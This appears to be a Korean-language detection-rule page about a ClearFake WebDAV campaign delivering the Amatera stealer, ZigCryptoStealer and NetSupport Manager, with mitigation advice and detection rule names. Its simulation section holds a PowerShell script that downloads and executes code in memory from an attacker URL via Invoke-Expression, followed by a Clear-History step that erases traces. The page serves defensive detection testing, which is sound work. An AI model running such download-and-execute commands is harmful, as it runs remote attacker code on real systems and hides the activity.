ClearFake WebDAV 감염 체인, 아마테라 스틸러, ZigCryptoStealer, 및 NetSupport Manager 배포
Detection stack
- AIDR
- Alert
- ETL
- Query
요약
ClearFake를 활용한 캠페인이 WebDAV와 Cloudflare Workers를 악용하여 여러 멀웨어 페이로드를 배포하고 있습니다. 주 페이로드인 Amatera stealer는 자격 증명과 암호화폐 관련 데이터를 탈취하도록 설계되었습니다. 추가 페이로드에는 NativeAOT 로더를 통해 전달되는 ZigCryptoStealer와 원격 액세스를 설정하는 데 사용되는 무단 NetSupport Manager 인스턴스가 포함됩니다.
조사
Cisco Talos는 우크라이나 정부 조직에서 의심스러운 WebDAV 기반 DLL 실행을 조사했습니다. 분석 결과, 두 개의 별도 감염 체인이 발견되었습니다: 하나는 pf.ch 로더를 사용하여 ZigCryptoStealer와 Go 기반 역방향 프록시를 배포하고, 다른 하나는 verification.google 로더를 사용하여 NetSupport Manager를 설치하는 것입니다.
완화
조직은 WebDAV 및 UNC 경로에서의 실행을 제한하고 비정상적인 rundll32.exe 행동을 모니터링해야 합니다. 강력한 EDR 제어를 사용하여 DLL 빈 공간 채우기 및 모듈 스톰핑과 같은 기술을 감지해야 합니다. 보안 팀은 무단 NetSupport Manager 사용과 의심스러운 블록체인 관련 네트워크 활동도 모니터링해야 합니다.
대응
악성 활동이 탐지되면 추가 데이터 탈취를 방지하기 위해 해당 엔드포인트를 즉시 격리해야 합니다. 대응자는 Amatera와 같은 상주 멀웨어를 식별하기 위해 메모리 포렌식을 수행해야 합니다. 보안 팀은 WebDAV 기반 DLL 실행과 환경 전반에서의 비정상적인 PowerShell 활동을 탐색해야 합니다.
공격 흐름
이 부분은 아직 업데이트 중입니다.
탐지
의심스러운 PowerShell 문자열 (powershell을 통해)
LOLBAS Conhost (cmdline를 통해)
가능한 PowerShell 난독화 지표 (powershell을 통해)
Telegram의 명령 및 제어 채널로서의 가능한 남용 (dns_query를 통해)
비정상적인 최상위 도메인(TLD) DNS 요청에 의한 의심스러운 명령 및 제어 (dns를 통해)
탐지할 IOCs (SourceIP): ClearFake WebDAV 감염 체인이 Amatera stealer, ZigCryptoStealer 및 NetSupport Manager를 전달
탐지할 IOCs (DestinationIP): ClearFake WebDAV 감염 체인이 Amatera stealer, ZigCryptoStealer 및 NetSupport Manager를 전달
데이터 탈취를 위한 WebSocket Secure를 통한 C2 통신 [프록시]
NetSupport Manager의 PowerShell 스크립트 다운로드 및 실행 탐지 [Windows Powershell]
rundll32.exe를 통한 WebDAV DLL 실행 [Windows 프로세스 생성]
시뮬레이션 실행
전제 조건: 원격 측정 및 기준선 사전 점검이 완료되어야 합니다.
이유: 이 섹션은 탐지 규칙을 트리거하기 위해 설계된 적 대자 기술(TTP)의 정확한 실행을 설명합니다. 명령어 및 내러티브는 반드시 확인된 TTP를 직접 반영하고 탐지 로직에 의해 예상되는 정확한 원격 측정 생성을 목표로 해야 합니다. 추상적이거나 관련 없는 예시는 오진으로 이어질 수 있습니다.
-
공격 내러티브 및 명령어: 적 대자는 ‘ClearFake’ 감염 체인을 시뮬레이션하고 있습니다. 목표는 NetSupport Manager 원격 액세스 도구를 배치하여 지속성 및 원격 제어를 설정하는 것입니다. 파일 다운로드의 서명 기반 감지를 피하기 위해 공격자는 원격 C2 서버(
https://kr.cedar2glanz.ru/jewel.js)에서 JavaScript/PowerShell 페이로드를 가져와Invoke-Expression을 사용하여 메모리 버퍼에서 직접 실행합니다. 이 기술은 디스크 흔적을 최소화합니다. -
회귀 테스트 스크립트:
# 시뮬레이션 스크립트: ClearFake 감염 체인 페이로드 실행을 모방합니다 # 경고: 이 스크립트는 탐지 규칙에 정의된 특정 악성 URL을 사용하여 경고를 트리거합니다. $maliciousUrl = "https://kr.cedar2glanz.ru/jewel.js" Write-Host "[+] 악성 PowerShell 다운로드 및 실행 시뮬레이션 중..." -ForegroundColor Yellow # 이 명령어는 정확한 패턴을 모방합니다: URL + IEX/Invoke-Expression # URL이 실제로 도달할 수 없거나 죽어 있기 때문에 try/catch 블록을 사용합니다, # 그러나 프로세스 명령 행은 여전히 로그에 남습니다. try { Invoke-Expression (New-Object Net.WebClient).DownloadString($maliciousUrl) } catch { Write-Host "[!] 명령어 실행됨 (네트워크 오류 예상됨, однако 원격 측정이 생성되어야 함)." -ForegroundColor Cyan } -
정리 명령어:
# 이 특정 시뮬레이션에서는 파일이 생성되지 않습니다. 메모리 내 실행 테스트이기 때문입니다. # 그러나, 로컬 사용자 세션에서 명령 기록을 지워 흔적을 제거합니다. Clear-History Write-Host "[+] 정리 완료. 디스크에 남은 인공물이 없습니다." -ForegroundColor Green